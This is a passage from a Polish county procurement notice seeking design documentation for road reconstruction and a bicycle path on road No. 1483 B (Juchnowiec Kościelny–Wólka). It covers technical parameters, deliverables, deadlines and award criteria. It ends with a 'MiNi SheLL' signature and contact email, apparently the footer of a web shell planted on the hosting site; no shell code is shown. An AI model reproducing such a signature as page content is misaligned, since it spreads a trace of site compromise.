- kanalizacja sanitarna wraz z przyłączami
- linia energetyczna napowietrzna
- sieć telefoniczna (w tym światłowodowa)


2.	DANE WYJŚCIOWE DO PROJEKTOWANIA

2.1	Parametry techniczne do projektowania:
                   2.2.1           Prędkość projektowa Vp - 40 lub 30 km/h - teren zabudowany
      2.2.2          Kategoria drogi		- L
2.2.3	Przekrój normalny - uliczny, szerokość jezdni 7,0m. Obustronna ścieżka rowerowa z dopuszczeniem   ruchu pieszego na długości nie wymagającej poszerzenia pasa drogowego.             
2.2	Konstrukcja (technologia) nawierzchni
2.2.1	Kategoria ruchu - należy określić na podstawie prognozy ruchu w 10 roku eksploatacji przyjmując 2016 rok za rok wyjściowy i dane z przeprowadzonych pomiarów ruchu.
2.2.2	Podbudowa - kruszywo naturalne/ łamane stabilizowane mechanicznie doziarnione destruktem z frezowania istniejącej jezdni bitumicznej.
2.2.3	Nawierzchnia - beton asfaltowy
2.2.4	Krawężniki betonowe 20x30cm, na zjazdach najazdowe 20x30cm
2.2.5	Ścieżka rowerowa i zjazdy gospodarcze z kostki betonowej typu Polbruk bez faski gr. 8cm.
2.2.6	Zjazdy publiczne o nawierzchni bitumicznej jak na drodze głównej,


2.3	Propozycje dotyczące odwodnienia i bezpieczeństwa ruchu
Wymiana sieci kanalizacji deszczowej  z zastosowaniem właściwych prefabrykatów.   
     Ewentualna korekta skrzyżowań z drogami gminnymi.  
2.4	Propozycje dotyczące zadrzewienia
Nie przewiduje się wycinki drzew i krzewów.  
2.5	Propozycje przebudowy (zabezpieczenia) urządzeń towarzyszących
Nie przewiduje się przebudowy urządzeń obcych.  W przypadku stwierdzenia kolizji, ustalić z Zamawiającym zakres przełożenia urządzeń obcych oraz formę zapłaty za opracowanie branżowe. Regulacji, wymiany pokryw i zastosowania pierścieni odciążających będą wymagały studnie rewizyjne kanalizacji sanitarnej.
3.	ZAKRES OPRACOWANIA
3.1	Opracować wszystkie niezbędne materiały i uzyskać wszystkie uzgodnienia do pozwolenia na budowę (przewiduje się uzyskanie dofinansowania ze środków UE na realizację zadania). Projekt wykonać na aktualnej mapie do celów projektowych w skali 1:500. Tytuł projektu budowlanego uzgodnić z Zamawiającym. Gmina Choroszcz posiada miejscowy plan zagospodarowania przestrzennego.

Prawidłowe wykonanie mapy obejmuje następujące czynności:
-  	porównanie istniejącej mapy z terenem i naniesienie na nią istniejących i projektowanych elementów infrastruktury technicznej oraz obiektów inżynierskich, rowów przydrożnych, ogrodzeń trwałych i nietrwałych,
- 		obliczenie współrzędnych punktów granicznych do wkartowania na mapę pasa drogowego,
-  	wykonanie pomiarów aktualizacyjnych (sytuacyjno - wysokościowych),
-  	opracowanie mapy sytuacyjno - wysokościowej w skali 1:500
- 	rejestracja opracowania w Powiatowym Ośrodku Dokumentacji Geodezyjno - Kartograficznej w Białymstoku.
Zamawiający wymaga, aby do mapy do celów projektowych były dołączone dokumenty dotyczące lokalizacji i rzędnych reperów państwowych/roboczych, w odniesieniu do których określono rzędne wykazane na mapie oraz układu odniesienia.

 3.2	Dodatkowo należy opracować:
- badania geotechniczne podłoża nawierzchni wykonane co 100m, a w przypadku gruntów  wątpliwych z    częstotliwością umożliwiającą opracowanie przekroi geologicznych
- projekt stałej organizacji ruchu (oznakowanie pionowe i poziome).
     - pomiary ruchu i prognozę ruchu na 20 lat

Dokumentację należy przekazać: 
 1. Mapa do celów projektowych w skali 1:500                                                             - 1 egz.
2. Projekt budowlany					                         		                                               - 4 egz.
3. Projekt wykonawczy (techniczny) branża drogowa z częścią przedmiarową i ST	- 5 egz.
4. Projekt wykonawczy (techniczny) branża sanitarna (kanalizacja deszczowa) 
    z częścią przedmiarową i ST	                                                                                   - 5 egz.
 5. Badania geotechniczne podłoża nawierzchni		                    		                       -2 egz.
 6. Projekt stałej organizacji ruchu	   		   	  	                                                          - 4 egz.
       7. Pomiary ruchu i prognoza ruchu                                                                             - 2 egz.
 
Obowiązuje wersja elektroniczna całej dokumentacji projektowej - 1 płyta
Obowiązuje przedstawienie do dnia 22.04.2016r. koncepcji zagospodarowania terenu w wersji papierowej, do której Zamawiający ustosunkuje się w ciągu pięciu dni roboczych. Koncepcja może być opracowana na mapach zasadniczych dostępnych w Powiatowym Ośrodku Dokumentacji geodezyjnej i Kartograficznej w Białymstoku, Białystok ul. Mickiewicza 3

Obowiązuje przedstawienie do dnia 16.05.2016r. koncepcji w wersji papierowej zawierającej rozwiązania sytu-acyjne i wysokościowe (zagospodarowanie terenu, profil podłużny z projektowaną niweletą, przekroje normalne, wybrane przekroje poprzeczne, zdefiniowane kolizje z urządzeniami obcymi dla drogi),  do której Zamawiający ustosunkuje się w ciągu pięciu dni roboczych.
Pozostałe Wymagania w stosunku do dokumentacji projektowej podano w Rozdziale 6.
3.3. Terminy przekazania Zamawiającemu elementów zamówienia zostały określone w formularzu cenowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie dokumentacji projektowej: Budowa ścieżki rowerowej wzdłuż drogi powiatowej Nr 1483 B na odcinku Juchnowiec Kościelny - Wólka (Gm. Juchnowiec Kościelny).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1/Stan istniejący
1.1	Szerokość istniejącej jezdni i korona
Początek opracowania km rob. 0+000 należy założyć na skrzyżowaniu dróg powiatowych Nr 1483 B 
i 1497 B w m. Juchnowiec Kościelny. 
       Koniec opracowania  -  km rob. ok. 2+ 250 (skrzyżowanie dróg powiatowych Nr 1483 B i Nr 1502 B 
      oraz drogi gminnej Nr 106754 B w m. Wólka)  
- od km rob. 0+000 do km rob. ok. 0+420 - przekrój uliczny, szer. jezdni 6,0m - 6,5m, nawierzchnia 
 jezdni  bitumiczna
- od km rob. ok. 0+420 do km rob. ok. 0+545 - przekrój półuliczny, nawierzchnia jezdni bitumiczna
- od rob. ok. 0+545 do km rob. ok. 2+250 - przekrój szlakowy, nawierzchnia jezdni bitumiczna
1.2	Rodzaj i stan istniejącej jezdni wykorzystywanej jako podbudowa
Decyzja zostanie podjęta po wykonaniu badań konstrukcji jezdni pod kątem jej wyeksploatowania.  
1.3	Sytuacja trasy
Droga zagospodarowana - nie przewiduje się drastycznych korekt przebiegu trasy.
1.4.	Obiekty inżynierskie
     Przepusty:
         -  1 przepust na rowie melioracyjnym do przebudowy

1.5.	Niweleta drogi
Niweleta drogi wymaga niewielkich korekt.
1.6.	Stan rowów i innych urządzeń odwadniających.
Wymagana renowacja rowów przydrożnych. Wymagana zamiana ścieków podchodnikowych na studzienki ściekowe z wyprowadzeniem wód opadowych do rowu przydrożnego.   
1.7.	Urządzenia obce w pasie drogowym
 - linia energetyczna napowietrzna
- sieć telefoniczna (w tym światłowodowa)
- kanalizacja sanitarna
- wodociąg

2.	DANE WYJŚCIOWE DO PROJEKTOWANIA

A.	Odcinek od km rob. 0+000 do km rob. ok. 0+230

2.1	  Parametry techniczne do projektowania:
                  2.1.1           Prędkość projektowa Vp - 40 lub 30 km/h - teren zabudowany
      2.1.2          Kategoria drogi		- L
     2.1.3           Przekrój normalny - uliczny, szerokość jezdni bez zmian. Obustronna ścieżka rowerowa z 
                         dopuszczeniem ruchu pieszego.             
2.2.	Konstrukcja (technologia) nawierzchni
2.2.1.	Kategoria ruchu - należy określić na podstawie prognozy ruchu w 10 roku eksploatacji przyjmując 2016 rok za rok wyjściowy i dane z przeprowadzonych pomiarów ruchu.
2.2.2.	Podbudowa - kruszywo naturalne/ łamane stabilizowane mechanicznie doziarnione destruktem z frezowania istniejącej jezdni bitumicznej.
2.2.3.	Nawierzchnia - beton asfaltowy
2.2.4.	Krawężniki betonowe 20x30cm, na zjazdach najazdowe 20x30cm
2.2.5.	Ścieżka rowerowa i zjazdy gospodarcze z kostki betonowej typu Polbruk bez faski.
2.2.6.	Zjazdy publiczne o nawierzchni bitumicznej jak na drodze głównej,
2.3.	Propozycje dotyczące odwodnienia i bezpieczeństwa ruchu

Wymiana ścieków podchodnikowych na studzienki ściekowe z wyprowadzeniem wód opadowych do rowu przydrożnego. Należy rozważyć zastosowanie większej ilości studzienek ściekowych i umocnienia rowów.
Przebudowa przepustu na rowie melioracyjnym. Sugerowana konstrukcja   - przepust z karbowanych rur lub blach stalowych z powłoką ochronną. Bariery ochronne. 
Wymiana nawierzchni na zatokach autobusowych. Sugerowana konstrukcja nawierzchni - kostka granitowa na podbudowie z chudego betonu.   
2.4.	Propozycje dotyczące zadrzewienia
Przewidzieć do wycinki wszystkie drzewa zagrażające bezpieczeństwu ruchu lub kolidujące z przebudową drogi.
Drzewa przewidziane do wycinki należy ponumerować na mapie syt-wys.
Przewidzieć do wycinki i karczowania zbędne zakrzaczenie. Przewidzieć do usunięcia wszystkie karcze.
2.5.	Propozycje przebudowy (zabezpieczenia) urządzeń towarzyszących
Nie przewiduje się przebudowy urządzeń obcych.  W przypadku stwierdzenia kolizji, ustalić z Zamawiającym zakres przełożenia urządzeń obcych oraz formę zapłaty za opracowanie branżowe. Regulacji będą wymagały studnie telekomunikacyjne.

B.	Odcinek od km rob. 0+230 do km rob. ok. 2+250

2, 1, Parametry techniczne do projektowania: 

Zamawiający posiada i udostępni aktualną dokumentację projektową i ZRID na przebudowę z rozbudową drogi Nr 1483B.  Zamawiający oczekuje wykonania projektu rozbudowy drogi o ciąg pieszo rowerowy zlokalizowany: w miejscu projektowanego chodnika - odcinek bez projektowanych rowów przydrożnych; na oddzielnym korpusie, poza projektowanym rowem przydrożnym - na pozostałym odcinku drogi. Projekt rozbudowy drogi dostosowany do rzędnych zawartych w posiadanej dokumentacji projektowej.
 
2.2.	Konstrukcja (technologia) nawierzchni

2.2.1.	Ścieżka rowerowa i zjazdy z kostki betonowej typu Polbruk bez faski na podbudowie lub beton asfaltowy (warstwa ścieralna 3cm +3cm) na podbudowie.


2.3.	Propozycje dotyczące odwodnienia i bezpieczeństwa ruchu

Rów odparowujący wzdłuż ciągu pieszo rowerowego od strony pól, budowa przepustów pod koroną ścieżki rowerowej . Jeden zjazd do jednej działki.  
2.4.	Propozycje dotyczące zadrzewienia
Przewidzieć do wycinki wszystkie drzewa zagrażające bezpieczeństwu ruchu lub kolidujące z rozbudową drogi.
Drzewa przewidziane do wycinki należy ponumerować na mapie syt-wys.
Przewidzieć do wycinki i karczowania zbędne zakrzaczenie. Przewidzieć do usunięcia wszystkie karcze.
2.5.	Propozycje przebudowy (zabezpieczenia) urządzeń towarzyszących
Nie przewiduje się przebudowy urządzeń obcych.  W przypadku stwierdzenia kolizji, ustalić z Zamawiającym zakres przełożenia urządzeń obcych oraz formę zapłaty za opracowanie branżowe.  

3.	ZAKRES OPRACOWANIA
3.1.	Opracować wszystkie niezbędne materiały i uzyskać wszystkie uzgodnienia do pozwolenia na budowę. Zamawiający przewiduje uzyskanie zgody na realizację inwestycji drogowej w ramach  Specustawy drogowej. Projekt wykonać na aktualnej mapie do celów projektowych. Tytuł projektu budowlanego uzgodnić z Zamawiającym.
Prawidłowe wykonanie mapy obejmuje następujące czynności:
-  	porównanie istniejącej mapy z terenem i naniesienie na nią istniejących i projektowanych elementów infrastruktury technicznej oraz obiektów inżynierskich, rowów przydrożnych, ogrodzeń trwałych i nietrwałych,
- 		obliczenie współrzędnych punktów granicznych do wkartowania na mapę pasa drogowego,
-  	wykonanie pomiarów aktualizacyjnych (sytuacyjno - wysokościowych),
-  	opracowanie mapy sytuacyjno - wysokościowej w skali 1:500
- 	rejestracja opracowania w Powiatowym Ośrodku Dokumentacji Geodezyjno - Kartograficznej w Białymstoku.
Zamawiający wymaga, aby do mapy do celów projektowych były dołączone dokumenty dotyczące lokalizacji i rzędnych reperów państwowych/roboczych, w odniesieniu do których określono rzędne wykazane na mapie oraz układu odniesienia.

3.2. Dodatkowo należy opracować:
       -     operaty wodnoprawne - przebudowa/budowa przepustów,  odprowadzenie wód opadowych do wód lub 
             do ziemi, uzgodnione w WZMiUW w Białymstoku ul. Handlowa 6,
       -     badania geotechniczne podłoża nawierzchni wykonane co 100m - na odcinku A  i co 200m na odcinku 
              B. W przypadku gruntów wątpliwych z częstotliwością umożliwiającą opracowanie przekroi   
              geologicznych, 
      -     badania geotechniczne dla potrzeb posadowienia przepustów,
-	projekt stałej organizacji ruchu (oznakowanie pionowe i poziome), 
-	plan wyrębu drzew i krzewów.
       
 Dokumentację należy przekazać:

            1. Materiały do opiniowania ze Specustawy drogowej  
                wraz z naniesionymi na mapę projektowanymi 
               podziałami działek                                                                                           - 6 egz.
            2. mapa do celów projektowych w skali 1:500                                                    - 1 egz.
3. Projekt budowlany                                                                                         - 4 egz.
      4. Projekt wykonawczy (techniczny) branża drogowa 
          z częścią przedmiarową i ST                                                                         - 5 egz. 
      5. Projekt wykonawczy (techniczny) branża inżynierska (przebudowa/budowa 
          przepustów) z częścią przedmiarową i ST                                                     - 5 egz.
      6. Operaty wodnoprawne (przebudowa/budowa przepustów, odprowadzenie 
         wód opadowych do wód lub do ziemi) wersja papierowa   - po 3egz. 
                                                               + wersja elektroniczna - po 2 płytki
      7. Badania geotechniczne                                                 	                    - 2 egz. 
8. Plan wyrębu drzew i krzewów                                                                       - 3 egz.
9. Projekt stałej organizacji ruchu (oznakowanie pionowe i poziome)              - 4 egz.    
10. Pomiary ruchu i prognoza ruchu                                                                 - 2 egz.
 

             Obowiązuje wersja elektroniczna całej dokumentacji projektowej  - 1 płyta

Obowiązuje przedstawienie do dnia 22.04.2016r. koncepcji zagospodarowania terenu w wersji papierowej, do której Zamawiający ustosunkuje się w ciągu pięciu dni roboczych. Koncepcja może być opracowana na mapach zasadniczych dostępnych w Powiatowym Ośrodku Dokumentacji geodezyjnej i Kartograficznej w Białymstoku, Białystok ul. Mickiewicza 3

Obowiązuje przedstawienie do dnia 20.05.2016r.. koncepcji w wersji papierowej zawierającej rozwiązania sytu-acyjne i wysokościowe (zagospodarowanie terenu, profil podłużny z projektowaną niweletą, przekroje normalne, wybrane przekroje poprzeczne),  oraz propozycje podziałów działek do przekazania Geodecie, celem przygotowania dokumentacji geodezyjnej i kartograficznej. 
 

Pozostałe Wymagania w stosunku do dokumentacji projektowej podano w Rozdziale 6.
 
3.3. Terminy przekazania Zamawiającemu elementów zamówienia zostały określone w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com